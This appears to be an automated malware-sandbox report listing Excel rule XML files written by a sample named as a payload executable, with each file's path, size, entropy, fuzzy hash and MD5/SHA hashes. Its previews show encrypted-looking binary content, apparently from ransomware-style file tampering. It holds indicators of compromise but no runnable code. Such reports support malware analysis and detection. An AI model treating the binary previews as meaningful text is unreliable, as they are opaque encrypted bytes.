                                                                                                      Preview:<?xml\.'~.4.....,h"q..........<K.(..=..~_..-..ve....:Tc.......V...].x7....-LJ.]j....#>.....S.1..............Z.S..f...._.7...F..l..qn7.s...3@F.(.q.f..Wx..,.u$.y]]......3Ch.....}...~...U..Vxd.a...BF..o7.....q..z.q......G.!..F..8F_..n...6..ZT...?.O.....9......$.^.......Z..(..~.{3...=*N....!.]..*..3..>jO6..l..3J.../7R^...`...Ec..q.......7l-~.B..].U7s.v.h..u...2.E..+....>.B...9{.l<.i.f....d..C.....x.W.y%R....y.`..............6.......6.......T....j....l....."...2....M.Qx'#e.[.j 2....n/A.`k..QM.a.....w.%....+..@......8..4...@O...6..ZOw.(../s+.K.....1.......{df&...Fy.,.>l..;.^?.](..zs......#U...t."u.z.0i......f/.8...]{j.?.K..\.4r.X..-7..+.>.#;.6.`.j...(....?....X\....Mx.rJ.D2Hb....'........?_..[.<m4..._....<4.xq`..,.z.?.I.l...._,..!.Z.:....t.W...(L....../8....6.m50.~.sv....P4x6.^....Zs.`....'......gJ.}L..DC1...59._.s.f.u..d%.al.....v^...P....[.....F. ....1u.....X........k...t.....e.;|Z.bq......E.m.2fZ........=. ..M.t.e.......c....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120501v17.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):8140
                                                                                                      Entropy (8bit):7.978384981019794
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:D0o2JfnhQ+TxNEn/MmeXPXy86SEB5AOE8hh:t2Jfn6+12/MbPXPEjHhh
                                                                                                      MD5:D711052BA48D7222712DFBB2C44FBB4B
                                                                                                      SHA1:424D30104294DEB9A5A2C1B282B3043BE8BEB1FA
                                                                                                      SHA-256:72CC7578711A92810A4B6E32704DD08C9FC4A01291895F046AFFFF90AE7688D7
                                                                                                      SHA-512:B32A83F190B303D57D61AC6C3DA77B2A1E368BF9EBEBADBFACB170E40877C664982F0FC693FEE2010EF6F3BDDB9F36761B058C08AB47C2ED01422DD8EDFD61D7
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlib........|.....5h......;..V1.%.%P....P...x.....!.K........I.C..-....y.#<...%.E.".^D....T.9J8..'E[.......M.P.......Q.b...).X...F.X...5...\.$.kI&^u.bx..k..}9Kx...+C...&.^}.=<.....w...I.q.(Hj.@.g....@..|.P..vM.,\....%.+.t.b|..A'....ss.Dr...C.LJ....W..k.5....."..._.;...i...6.@$..5..M.J..P.O..wO.X`E....FEC.../1.h.qV?..q...t.....|.u..5.....Xw..q..@.<U.....$5.p Vd...:.C.....I+. ......U.e... .LFrk.I....$.[....~.. ...V<.b"A"..^.m..`V..X.v......K....xQ....S.o..|9. .$.E..e..@.,.AR.{.......j......L.........R...?.E<8...B. ....,.f.N.{f..........(h.]..kdj .4..A..Fl.."....u..H.1..m.#w..L..1..t<.........uk.......A.w@@a.j...`.`.,V.'.........."-..eG.x.d#.M.Kc1.l?.-..Z.M@..kd ....r}..'...w..h.%B.^11..,K........S..A....'..m.....F8wz.dk....|*%wH...!...2B<+8......w.....^.-.m.eb......x.....I..]...OM[)?.xZ.q.I82..D.(.F*G.{...zT.......<..:{.[..W..ZGeN.......oI.o...kD.s.mJ!.......3..i..Q.9~.%../.Ca.....}.....@o+F.%...#c..>|..+$N....)G}.Y..;....8.[586

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120600v4.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3313
                                                                                                      Entropy (8bit):7.944740006851449
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:bZepsd5w1GblXhxWsQnahAUN8CSrbZomhpVS4KNEPu:bV+1GblxxWsbinZo0S4KyG
                                                                                                      MD5:16635F9CE992A2228C1B8759E87A8898
                                                                                                      SHA1:9E40E343CE266C161B8F75C7E5B266493220F877
                                                                                                      SHA-256:F24D0444B7EA642B2ACCCFF1B308F1400A79875EDD9916FA2B85F41D0A93404E
                                                                                                      SHA-512:91B1AD894F8A94375BFB8F3329B24AA6890A39B25479FC261E3D2EC10613C79C8B78E64954D9069351E4F9B43F632F412B5813F32D55C5FDD03D56062CD1A7E3
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..#JG.....M..5O...6.~^..Q.F._...\..R*..s.)j(./_O..`$...y.._<.....:U/...N.!)l..B.. @.q....@./.@..a...e.;..?....Y..[4..y.....L`...6..+.......`d.0.m.3.M...D...q.z..ot@.0.v...&.Yg..,.......3.N]...9.N~.....-..d..;++~...4..k.G.CR..\.^|..H.G.;#..fU.s.W'.HiN..EH.d.x..75l[...wMA...O..Q.."..H.6.rv.o.?*..}9.d.l..2...(..J..8..[.)....e......`.l.|h.......5kL..o..-C...5...hV...r...(&.K..<..R2l6.3......A4~....n...!V.|....ok..D.....y.xp......#....h!L.#.$_.r...Q9f....(:.@.f.m...'.-...4..N...+..b.U..;.h.^....D....9L..]....,^...m...c..I..4.....8.}hoR.+.a.?[F..=>. ../....Dd...t..:a{.Z..c.`)...%\.s.........~..u.xl..|1...~U.x...B.....'.G....o8........O........C.r.,.........X~u..(\8.W.H,&.L;.%.........@F.u.2..NJm...H.mdc5..R.\cy".z..!...t.9B....s..w.Y....aw...h.s.TdM.S.!.k.'\<3$=..Y.L...y..].....8?&P.h..J.......`....r...h..z..^nW.s.f...>.>HJxO..SF..P.zU*.-.y]...Vy.l.S.?.....(+...93.Yx..-_b.G.K...`...s....."...=...1.Q.=........&M86.S..[.m...s......

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120601v3.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3675
                                                                                                      Entropy (8bit):7.951606192682855
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:Md3UMlougKMqlrNU/Wk9IlITDnOUXj1/fENZQPd0bzsL+KXlyKjgxNwZdHnITDso:MdTiHmsW9axzVELQPnL/XlprdHI8o
                                                                                                      MD5:3602F36327C5B5D58A164839D3C06DAB
                                                                                                      SHA1:A5BC4971AE63AB322D4733CB32A022D12D76CC72
                                                                                                      SHA-256:6528D9B629511EB4A70FEB56D5C6A21F1182870E6338599D4A7F5C8D87A7FC86
                                                                                                      SHA-512:4D755A733A8518166791A7A098B38251E4A66D0BBE6AFC7593694950299744E23555BBA685C91AFE6C6054B83B67D4EA481008AC2313E001979618482CA10B73
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml9..F.J%.0...p..1.Nu.H (.&n>H.....w@.[....aL.. .ZS.p&ZC.N.....q..].].Q:.4....{X.s@ ...7S!!.....\.Ff......=..r. ^.........m@....h.V.. .B..U.t..9.vO?{..~~..j@..r....i.2.j....A../M..&`...NP.+..hp.ch<......q.u...Mc.z..M.A.^.7.XQ....@ .%....u..BSV....0W...+.u!....R.;...k.../.S;.V\....~....t^..V.W.@.R/#..+O.%7.PYA.{.m..%]..[6...y.o.....z....ge...!.{Z8..@/z...V..y..N.Z{.4.4i...^DT#a.=%h0..`.....Bl...v.....6.."9....RY..SR...qh...0..xH....+N..tP........;[fT.V.c.;aL.D..-.#d.+....^.z.,.......$8k....$....S..Q.^.h..B.EM.]T...e...}....~F.UC..]6X.S.. ..h.~.......c.....@6..1N.3...../E.....nd..\/.,^...t.....~....m.E...sS|..9"....}...3....`..^e./;?.]/.NL.(..m.?S:.cF...F.K.e....7G..(....m....|......Y..*aP....+.^Qu.t5....V<[.D.[u.....e.P...ER..W.....0.S........9/WU'..9..;.;.c.#B!....y...z6.*}.>....[.G.h.?n...y..i...@.....Y1...C..$..f...V......I.e...)......%.r`......'(.B.!...r.g....p.k...0n...Iig.J.x.5..G.JGh..W.NM....._....e...z...h2(.+....'.G.Y...]...

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120602v8.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2924
                                                                                                      Entropy (8bit):7.920695952324178
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:7qsm+DQnivNK10+rlm6mIRZ1DjF5OW5hAhxOQRs7qTI5Oj0Sw8VmUqEwD:90nic13rsWRzR5Q/RL87Imd
                                                                                                      MD5:D25F6B2ED34F0595B72AC531E057A700
                                                                                                      SHA1:4B5D0AE5CCA913381B011C11C0CB1561803CE2A1
                                                                                                      SHA-256:B93E48BD0C474D198D2229AA89BEA6ED7100917FE09F322440E4B8749DCBAE31
                                                                                                      SHA-512:8A6757D27FED7BAC035CEA91F13EC2B85E1CE68FF22587E375D04C1DB91C98ECFF289417C6AF22193641D2FC257C937E72B92D9573069AE78AB1483A8540B369
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlN..!....<.!o=.....%...+...c..o"..C.....s%..V.+.ptB.}.P'{.@...t./w...1...y..7....Z..F..)fx._.Q...2=.7VxF.^t..M.4..6.u.N0..<...X..Z..D..q*=.S..j...U..NJ(.-HN./....5iX0 .<:.YfzY6p..S#......-....yU.D^.:)..nF.....5s. a.^.) ....T. .=...-.v....O.3'O.s..:Q.i4h.....I......4...6.?H=C(.(.&`.Z.%93.J....``..s......s...BA.@..G.+ ..O......g..tkC....>..'A.rt....Nf.6N..;..ZJV5w...0....>.m.....m.nD.1PS.....'.~o..S.N9.7.Ir....gq....gq...x...-.u.....6....]...Z......fD..`l.....**2.....z..v>.Hda.[%......J...!....}..........bP....:...I......X../&._~.~...Q}..nv..".....$..............^...O...&.*=..2..;.W.s.t..(.[...G\.XA\..$....OS>.Y.Nv.....+......_T..............T..=.%].Vk.A.#.....(...kk...k.<....+..{).....i.C....~Tw...q...Na6..P....3%.*%.?~?..../.....K.,nG\..5.8+...@]Z/..`.'.....!..4...;...s..r.}...4~r.nx..Z.i_....6.$......q.2=...yl..C.E..q...zT.os../..O..5M....*......L.X.H..G........P..B.I ]+Nz.....#...r..i.....#E`T.^.6r...lf.......uN.XsX..O...m..$.8.3(..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120603v8.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2461
                                                                                                      Entropy (8bit):7.916722429256722
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:870jexoujNkwW5hatNK0G/+6831+cCgYPjV3alML2jpeAvWIpInwD:8IjPuhkZatNKvwl+cCBoMkpdF
                                                                                                      MD5:24AD3879D4E93F317CEA5D28C2492194
                                                                                                      SHA1:2D82CDCAEAB25EB62A7DC13E4361C2D41D1C0507
                                                                                                      SHA-256:0A6F7205950BCDB7B93C79FCC3D1EF558B01D23D69C5BDE4D5A73CAC1D252238
                                                                                                      SHA-512:5EFB4C2BDFD90D6FE733A8A00AD2C81150CAC5176DEE2BCE6C68BD7876FD17E47E46A6295A6E22281CABF8F357D3E13C21A7644D526F74E9FAFEFBB9CD342812
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlx.R.g..*f..W.*c.mY..k*.I..&-....mhed..k.... .V|1.48.!*a..g..O..;..].....^;.g..0....0...w.8/9pk....$.....I..\mRaU..3...;.......?..c../...#PCX..LR..)..)T@.W.]...p...5.{...t..C..%)...<.X..1~. ....9.av..].N.u.g~....[*..[.....wy.9..t.t,.Y.i...^..8x......:..X.e...]..... ..J........H...y..O..0E..C{".....&..........n.R........., .........rK.\Dd.6B.....w..{..\g:....Z..R\.......Hi{".bb.......a...)j.A.|..%....m...\...7.LNA...@%.L..;..g2...C....a99.d.............r....i.9Of#kX....3..F....?..t7.._.~..\H.. ...E..-.=+.2...............{.ZZ..U... '.\ji.*.A(x......fu.....D1a..X\JJ.e..v...x.3...........G......e....Z...k..).I.....<V..!...v.gIr..........q....W^..`.....p[...U.....XCC....Rd.D...=......q..`..N.0.p.......:.e!.Z....o.....E...0.....t`.._F.7.7..F.)......*e+..U.2\i..........J}S.S|.J..Z.r.N..]!.$.[...{..l..9..;.*8....".....g'9.<]..A../.-gI...i.J?@%.....6.=..n.....(D.%.?/.+......r..8...3..5.>...;`]...^...d.aj.........s...n..%....\..B.F.^......oG.E....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120604v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):758
                                                                                                      Entropy (8bit):7.700563812036689
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:o3q1NBXtkECsnN6Rvbu78QK57bPScgiyW0B/zHksW2tzQBQQFZ8v6cii9a:oY3Xtj/yTwM7bC/zHksWwzYDFZ8v6bD
                                                                                                      MD5:45BF1B0E64E2593B73834763D2EC2C2B
                                                                                                      SHA1:9ADFFC0542EDA4A6E572CEBD0C3C0339F0985CB9
                                                                                                      SHA-256:0F75F8E46EA0AC7DC796E5B88F210E5E070DC8831113F246F7882A07FB49EBDE
                                                                                                      SHA-512:27575B4A0398A69225DA876589022CA2EAF85A23F0B2FE99B1C0040D260A3E22E65D71C17F3B235C8AD7D859AD895A90FAA7764AFEAAB9813416B4ED6C632EAF
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlUN..z....n..'..T./...f!.D..JT...m.}.=.I.|......f.<.X9.V'..W.BU.^........"K..92.)r...r/7v..j,....q*w....Ot8.D.n..6...+..VY#A@.U,...8.>.4..5....J.U...:@.!....O_.G.S.~......Ra.,9Z..[...$.{q..@....sU.[..j...!.[..\..7%..i..d...T.]0wS.........Kj).).K!VLf../..L....D..h(...ZD>..k..ML$..C.........I.T.C.>p..p............-.h.;..7cIf.)!?j.t-..Y.yL,Uap+.kOl..v.nXw....Z..;.4.t.hz.s.C7ve....uA.ge..rO&(n..@.z..@..'.hO.b(.>F8>...\ym.*@..0'}.<#.W.3v..62..u.H...S.;....?..u..........,-.. .........o...C......GcQ.9.m.eH.P.8.4E..+.j.^0.....:.#.YQ.e.Z.S..ns.....u1.N....S=.[.5.&T.8........fG.".O.-.|S.ZjL..%.Ku..6..5..Y.Q{.E{:.....5..o.`s`.J+..Y...].....*f@P.O.Z.hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120605v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1210
                                                                                                      Entropy (8bit):7.811537659123975
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:ggjh2h2ZjdrCRx3aTThWMg064m1OAZhmWfPs0X0qSFZnjVhPyJNpv6bD:gfh2zrCRx3aTThWb4eOq5r0qSFZnjVhb
                                                                                                      MD5:FA7F25552ED014BFB58E28013B4496C6
                                                                                                      SHA1:225EF7D9C8703B6BB5C6E0925851CD8277624439
                                                                                                      SHA-256:B7D1BC2B6714F1E65CD834533ACEBA499A1AD906C765FFB8BF38495C6C20E1EA
                                                                                                      SHA-512:5427CF3335018FDDD201E6E7C3A2DB37E3EB27A8C8585ED84B3359A52D3C6A0541E4C111DB6C3E874845983221F462275C861781405B73083A693AB1D81444FB
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml]B.....o...I.....W8.:z..y..|.r..{".9..Op...v.......1q.Kt...>....X..uLm.h..SlT.6{|!..<<.aeE.(..&..|...p>....r..W.M7....tM3...0.7]..(.E.T......k.`....y.Y:...I..D6N..h.1.<.6...R%.%s...~../%8.x...L.9wE......._..H...|.*..Z....CqW..o..H.......9.S/..........qG...!.;.6uD....>.A..".gd.......~'}.q.~J.:..8....&.z..wW'..(_.)1.!....Wg...f.3:9...g..u#.V.C..._......K.T.(QHw...`......-..4..............d.......:.....a..~.1w11.z..Q..xW.J...x.^W..0..n'o....m...........[x...D..<.h....T64y..}.....@..i...j0..J/....{w.\r..3.o..9W..e?..Y....7.....<...Y..qH.0.j........q...k1.o..j.P^.DN.......J......}..u.-.u...f..g.Jn..J[..s...Z...%.y..2~~.#...p.....t.s.bN........T-.*........f...$.V....`..6...3.5.^......m#O@ :.S~.H..R..V'-&R..N....V...14(Z..#...f1.f..\8.....-.n....1....O..Cxy[...$ig8......A....1y.2#...(...gF.M..C-..e.....g...gR.2..D..,W....E..gW..)..6.....Q`...5..C...I.".X.....{.......-.=...R..^....A9.e&....BP. ....A.}....{...N..G.R..M.E.%...0.,.D;B.Dsmjh.,..r..cv

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120607v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):537
                                                                                                      Entropy (8bit):7.57639251405526
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:AvhVKcjjeTPXp8oQasE0G7uz6E0UjwNZO6G0oyfcv6cii9a:Az3jSTXp8oOX09Zm2fcv6bD
                                                                                                      MD5:FDFECE83305ADEB6A634FB733E1A9A32
                                                                                                      SHA1:C2AC3CE2E5E6E3C4C6676792AE42015CE35FCF47
                                                                                                      SHA-256:0B6F37A96B3730DCD376D3DA4BD283FF3EB6BE2BDC2B6CE304A6116DBEF29328
                                                                                                      SHA-512:5500BED36E561D9FD7FF30B0F2509DEF5BA1482C7E8D74D4200C569FAE9752B1227859352000BCE11AEBFE3F2F671A38D8A2FABDD28DCF875AEBBCDF3767F180
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..l.....=._N.F..Z.-y...Rj....V.......nQ..W .].}9..eR....nR..Q@..6(..zC......H+.px.S....2SJl..*........F:......F5$...J......9......s..3..Ehm=`6...H=M....!....NaG.....mB.|O......K..])-.......2N.s1...BhE..U..*v..{k.>......;Tb.Pk.c.0.W....1V...Tf.......>......Q............@?.........jyXv.;.-.=..z...1.1'.....<....W..V*U...s.iSx7.`C..-.L ..b....9.._..7s.?|.....Y+f..D8:F...gq...6.....'.YWi...^.3...T.....W..J....B}..i...v).....ui..hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120608v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2493
                                                                                                      Entropy (8bit):7.904688027357272
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:Ecq1kGOZhr8zZUw9ZOPo17TSy2EXm6hKAS6pGxfHkaO3fRgQwD:AqZhr8zF9ZsoYdshCwUHknpgJ
                                                                                                      MD5:A4B9F646BFD2BF29452FC6FAC9273786
                                                                                                      SHA1:117A684F61D79D5A2080C41301853CB2B2F49E35
                                                                                                      SHA-256:4CA73A2D2121D5F2D9CF5CF919486A72E795BD81E684C7DE4B78B3AD556A2553
                                                                                                      SHA-512:2299CB5581D5DF14B9729422B91E53B6B11853A3613A2D69087A46F73640EB31719BEF6913FAEA8A06D59759D9E2A1435EBD532C153E046857BD548AD754442B
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml....4E.]6t..`...N..c....E.m.Z..(.H....C.}r.KFjl.L.....T.~..~.b...N.....I).....3Y......$....h.!..U..._.{)...B..{....R..b.V.>.M..$w.4."UY...)Xe.'qN..iT.*....*.w.<.XK.dm|...i.....g{..#V.q>>.b.l..&...[..KZ..j..N...~.......~,_"./u@..#..c=Y..?.B...u..>;cH..zC(."N..H\......6..[[.1.......... .i=..}x.h..2.b..A........*.+.M..../?.,.TA"..g.2..../.F.^.+.......n..).Z.fD........jMB...#:x..V.......r....(...2....-..,..m.6..j.A.s..X.90......a.D.....TD...T`0.z.)..cS\.FB..P.E....rx....(........._...]..B.?...X...3W..).2....5...?...a&..y.S]..tuEK..P\....Gl...c..g...x`9A.,>Yi.qbD....h....D...&1S.X..;....Y...t......@.......h..'.z..R.:<!.F.....xz-m.v:.},8D...jLJ...n.=....".....|D..J.>...|...5.G..H...&.U>"6f.....4X....0...>*.U#.MT..*..T$P..l.........a.@2.)L$.?.....8.....>.}......5B.$......@...]..@.M....i.C/........o.M!kT..p 1,..J...j.NN..%.`.Xz;L.$..]..3.5`M~.b..../.1.h....?.aXO..@kg.,;i...>..H...).O)..Z.#........q...zP.J.j.a%.P..9.@.,..>.Z.%..e.$"Z....-.j'.MHb.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120609v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):741
                                                                                                      Entropy (8bit):7.734254163081575
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:ssJbGQ80SoeH+RIJojzYMnO4xUttfbQlTBI6hGAe7JB6w7/3PoUg66s1PMiZv6cq:NJCQz67GO4smhGhew7vgAk+v6bD
                                                                                                      MD5:35D9C6A9E2C8EB940F1E684481471E9D
                                                                                                      SHA1:35596E4C1466ACBDA435414A8E1299CD3B20E365
                                                                                                      SHA-256:658AC332D4644834D00221C85BECAA92B064E5097B20CB039B4883AD196A102F
                                                                                                      SHA-512:E4E3A6F567B318EBDEFAFDB09000E50C485DE4281361101DB30451A3A62355A63C89EC0B8CE55E46B97B282EE65968334333F1A1A78C1429740AC6617A4A7C36
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.8..+;IIi....q.J[/..F...PX......C.D.>jZ5.....x..b9I....+..G@.v....kyb.(.G.....*S)\j.S..`v.%.....7...AVp*.....!..j.2.m$...*...tU...H..4....|..huh.m(F./.R..|y....)L...b.i.V...Q...D,..+$nz4...z..^.".....2.|...8B.7R...u..]..._~......4..._~9..:......[c..1.0...6z.".F.R.0.....o..X.^\>....mk.,O1}A.....~..iv.y.....3.R..._i.l...l...l.]..-]x..i...:...~...=1U.*.AfaZQm.6..8...%\n...LU.jN.......@...Z&.d..N.....4.~......^....G..L......f1..[..5.....x..5..'..s.F..f....@.6.~kf....U....N....."...c..@.k.J~.....b...8P... ..X....-...(....S.-.....T.#..o.$3..]$.......G.oQ..j...\T34MIQTdZw.$......?.D.Y/tr,....F,.A]..w3n.V|..T...1.V~.:.f.hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120610v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):807
                                                                                                      Entropy (8bit):7.767173278555154
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:wLoggbqyiVo94MDM3hJyPC7mC6FWWyYvoVa5riF8uLv6bD:w8ggbqyiVo9Pan7mLgWyYv5mPwD
                                                                                                      MD5:10F2F90D7A27BF806BD0D2EE4A34E9C3
                                                                                                      SHA1:E9021E6097C503978D876DB8A88181E3DA49ADC6
                                                                                                      SHA-256:43ED4E5B185D50B73B94DE1A4CC548AF4865924B4D12F5738DC71A89829C9FDE
                                                                                                      SHA-512:4AD80FFEBC6552B6C4045F58ACC4EF160AE51C5ECAB80EA608A8A90E1AA8B168286D7F4795DAFD12492A74F47F4B28ABF7CAA9A682B45B3C6A5B14829437DD48
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..83.c..~.).$..O...m.X.J..St32....J..Bc.1........L+.....q2.c...\.g'+..."Nv......Z.......!...e..".uD..V....r.n.....@..8.\.tXQ..)g.GX....+.iN.o...8W...Xo.b..qC.R..@h....D/%.D5..._8..-[.(.?...\......R.^....F.+qf.../.w]^z.N..rS...]......}.}..:D-..W.I.....6..tX.n..GN.....`....'.....1Z%..b..I5Ho.$...a5.:...$...8.?...<..{.b.g.^q?...d^..%q5...v...w.ti..,x.q@..U.xh...g.+......t..|..u......`)~U.....7....$w....4...jt.$.7...I...jj......f:....0P.^.N..zV.!.l.4q.R.O..z....~+^........^.. .,..:F....r.ld.(h:...L.6.....n...%>.|..`{.7...p'.n.o...9.F.sz.........$(.=.[...s.*L.%.L.q...~S.g.'Z.8Y]U.KfDp...p.....)-Q...2... .K.U..2..i....... o......X.-..l....M....;.Av%.@~....f....cn..}pL...+k....hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120611v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):748
                                                                                                      Entropy (8bit):7.691074535826759
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:MeEh4y9j6f1+epr+lp8S1o1b86GzP3PnwSZDCxQIQal8Iyh0+Dg2yinv6cii9a:q5+f1wro10Tnwxx1uIX+E6nv6bD
                                                                                                      MD5:B470E42B56C1134B45D2E77AD27850CE
                                                                                                      SHA1:FF4867762D51ABD43E8D75D169A8B868347A2335
                                                                                                      SHA-256:BD9C011174D8521AF05AA45A97847F68DF38C98A35F8C5703F936BE8EF6D2297
                                                                                                      SHA-512:FB46E390B7C677814D264AC435C6A3320DD508D9F5E27AAE18B1C3FA6850190F52B1F24E8B7150666FFE0DA5F405E87A6335DE561A49ECEA5ACA8E91B58B980C
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.%=..G.....F.;.oCG2....]...>.{...L.`..........Q/.._./HJ...1.`.K.['.<...f.L:....x..4FF.....z.F.S... ..7.Y..&.{{..0y.K'..VQ.[\i4.A.+........Z..wD9......{Y..zv....MM.F.z.P.QzH..:.N...lo.c.....9.F....e.D.....t....`.e.e.Y..a..U;tj.....g..U.\{...tf..C........U\..Q....{..?.Bx...L{3....]U.[Z..K.t..3.....[...^H...M.0..m........,X./..k >l.._.n`...o.vV...<.~~V..#...~......U.n..._.je...G.+..$.....+._..A......X1.4k...Y}......).C.Ce.E.(x.0....s.K...#..I....K)..j3..ryC.,Oj..b..h.wyOK.Sm....Y'...o.p.!P.'..m..C...S..>.2@._9.d ."...|C.ObL........`w8...."...7{..t.........L.O..}d>...9...S.q.....'.h.+..5......HCM.0....V.ge...D..^.v!..D.?S.W..cM$.hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120612v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):804
                                                                                                      Entropy (8bit):7.702243516748087
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:2eAyHn+uGdU/sYgoSJcGiK8H1kZR4iBMv6bD:tAe+1did9Sv8eXFBMwD
                                                                                                      MD5:3DD1D4BA412A11E24DA4222455C1E3EE
                                                                                                      SHA1:B7C21E3D613D9F3B91B21301631A3A6F84282A97
                                                                                                      SHA-256:4FB4F3341AC7F0819491901E1775E999425B22942FC6A465083716757E83B998
                                                                                                      SHA-512:A2030FF03DA61383ABF92AF01B003ADC1A29577004D25E6009BD17C20B0C63943DDE8DB009D3C9FB40E09D31AA9914FDD7E01474EFB35351B7D127246AF3E4F8
                                                                                                      Malicious:false
